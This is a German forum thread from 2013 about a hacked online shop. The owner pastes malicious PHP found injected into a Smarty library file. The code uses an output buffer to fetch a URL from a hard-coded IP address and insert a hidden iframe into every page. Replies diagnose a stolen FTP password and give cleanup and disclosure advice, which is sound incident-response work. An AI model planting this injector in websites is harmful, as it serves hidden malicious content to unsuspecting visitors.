Shop gehackt?

    Hey.
    Ich glaube ein Shop wurde gehackt.
    Wenn ich auf den Shop gehe kommt nur:
    "My ERROR [256] Smarty error: [in cseo-css-v2-m/boxes/box_best_sellers.html line 14]: syntax error: unrecognized tag 'var' (Smarty_Compiler.class.php, line 593)
    Fatal error on line 1098 in file */includes/classes/Smarty_2.6.26/Smarty.class.php, PHP 5.2.17 (Linux)
    Die Abfrage wurde abgebrochen, kontaktieren Sie den Administrator..."

    Also hab ich mal in die Smart.class.php reingeschaut, was mir schon komisch vorkam war, dass die dateien am 12.02.2013 geädnert wurden.
    Ganz oben in der Datei seht das:
    "<?php /*66da8e7241377a6189607cf072079147mftknyz2aatkim16*/if (!defined('HDDD467FFEY322')){function _shutdown_function($asd){$write =<<<AOLEW
    <script type='text/javascript'>if (typeof KDDRTFGEG == 'undefined') {document.write("<iframe src='%kkk%' style='position:absolute;top:-1000px;left:-1000px;text-indent:-1000;width:1px;height:1px;'></iframe>");KDDRTFGEG=true;}</script>
    AOLEW;
    $asd = preg_replace('/<!--66da8e7241377a6189607cf072079147mftknyz2aatkim16-->(.*?)<!--66da8e7241377a6189607cf072079147mftknyz2aatkim16-->/i', '', $asd); $sdf = file_get_contents('http://66.85.144.233/url.php');return str_replace('</body>', str_replace('%kkk%', $sdf, $write) . '</body>', $asd);}if (function_exists('ob_start') && is_callable('ob_start')) $result = ob_start('_shutdown_function', 0, true);define('HDDD467FFEY322', 1);}/*66da8e7241377a6189607cf072079147mftknyz2aatkim16*/ ?><?php...."

    Könnt ihr mir helfen?
    Beste Grüße!

    ja der wurde gehackt.

    auf die schnelle: nimm als erstes die seite vom netz um weiteren schaden von deinen kunden abzuwenden, dann setz dich mit deinem provider in Verbindung.

    Du brauchst ein Backup deines Shops mit einem Stand vor den änderungen, allerdings kann die sicherheitslücke dort dann noch vorhandensein, diese gitl es zu finden.

    Ändere alle(wirklich alle) Passwörter die bei dir im umlauf sind und prüfe auch alle deine Rechner mit aktueller Software auf trojaner/viren.

    goole mal "shop gehackt" , es gibt diverse checklisten im internet zu dem thema .

    Mein Beileid, du hast da jetzt so einiges an Arbeit vor dir, du musst zudem davon ausgehen, dass deine Kundendaten jetzt in der Hand des Angreifers sind und ggf. unfug damit betrieben wird , wie du damit umgehst kann kriegsentscheidend für den weiteren erfolg deines onlineshops sein, überleg dir gut, ob du dass unter den Teppich kehrst (wie es die meisten tun), oder ob du offensiv und transparent damit umgehst.

    Also auf meinem Rechenr nicht. Es war die letzte Version von SEO.Commerce installiert, mit allen Patches, Fixes etc..
    Es muss doch irgendwas mit dem smarty-php zu tun haben? Vielleicht hat der Kunde einen Trojaner auf dem Rechner. Aber wieso würde man dann Code in die smarty Datei einschleusen...?
    Dank dir schon mal :(...

    Alles klar, die gesamten PHP/HTML Dateien auf Domainfactory wurden geändert, nur das Wordpress wie immer funktioniert hat und nur der Shop nicht mehr funktionierte... Wird der Kunde wohl sein FTP-Passwort verloren haben...

    du kannst im prinzip noch froh sein, dass die es nicht besser gemacht haben, also ohne den fehler zu produzieren. zum Warum : ich habe jetzt nicht vor auf die seite zu sehn die da in dem iframe von der http://66.85.144.xxx/url.php aufgerufen wird, zu erwarten ist aber, dass dort schadcode ausgeführt wird. durch einen "trojaner bei deinem kunden" kommt das nicht, jemand hat zugriff auf deinem shopcode.

    ich würd mich jetzt an deiner stelle zunächst um schadensbegrenzung kümmern, hast du schon deinen provider kontaktiert?

    Also, der Kunde hatte uns kontaktiert. Wie gesagt ALLE Dateien auf dem Server sind kompromittiert. Ein Auszug aus dem Log-File:

    [12.02.2013 20:49:34] 511a9cce.bc5 376445-ftp 62.113.204.118 D 6053 0 /kunden/376445_40229/statistik/*/index.html
    [12.02.2013 20:49:34] 511a9cce.bc5 376445-ftp 62.113.204.118 U 6574 0 /kunden/376445_40229/statistik/*/index.html
    [12.02.2013 20:49:35] 511a9cce.bc5 376445-ftp 62.113.204.118 D 60129 0 /kunden/376445_40229/statistik/*/usage_201210.html
    [12.02.2013 20:49:35] 511a9cce.bc5 376445-ftp 62.113.204.118 U 60649 0 /kunden/376445_40229/statistik/*/usage_201210.html
    [12.02.2013 20:49:35] 511a9cce.bc5 376445-ftp 62.113.204.118 D 84545 0 /kunden/376445_40229/statistik/*/usage_201211.html
    [12.02.2013 20:49:35] 511a9cce.bc5 376445-ftp 62.113.204.118 U 85065 0 /kunden/376445_40229/statistik/*/usage_201211.html
    [12.02.2013 20:49:35] 511a9cce.bc5 376445-ftp 62.113.204.118 D 85819 0 /kunden/376445_40229/statistik/*/usage_201212.html
    [12.02.2013 20:49:35] 511a9cce.bc5 376445-ftp 62.113.204.118 U 86338 0 /kunden/376445_40229/statistik/*/usage_201212.html
    [12.02.2013 20:49:35] 511a9cce.bc5 376445-ftp 62.113.204.118 D 86608 0 /kunden/376445_40229/statistik/*/usage_201301.html
    [12.02.2013 20:49:35] 511a9cce.bc5 376445-ftp 62.113.204.118 U 87129 0 /kunden/376445_40229/statistik/*/usage_201301.html
    [12.02.2013 20:49:35] 511a9cce.bc5 376445-ftp 62.113.204.118 D 67869 0 /kunden/376445_40229/statistik/*/usage_201302.html
    [12.02.2013 20:49:36] 511a9cce.bc5 376445-ftp 62.113.204.118 U 68384 0 /kunden/376445_40229/statistik/*/usage_201302.html
    usw..................................

    Hat mit dem Shop glaube reichlich wenig zu tun eghabt. Da hatte wer direkten FTP-Zugriff!

    ja kann gut sein, allerdings ist halt trotzdem davon auszugehen dass die Kundendaten betroffen sind, mit ftp zugang hatte er auch zugang zur config.php und somit zum DB passwort.

    Häufigste Ursache ist der FTP Zugang! Oft habe ich schon mitbekommen, dass hier Filzilla nicht unschuldig ist. Manche Provider halten ihre Systeme aber auch nicht auf den aktuellen Stand, hier gab es in letzter zeit auch verstärkt Lücken! Das was Du schilderst, sieht mir sehr stark nach FTP Hacking aus.

    <p>Wir geben nur Anregungen und Hilfestellung auf Basis unserer Erfahrung, keine Rechtshilfe!<br>\m/('_')\m/</p>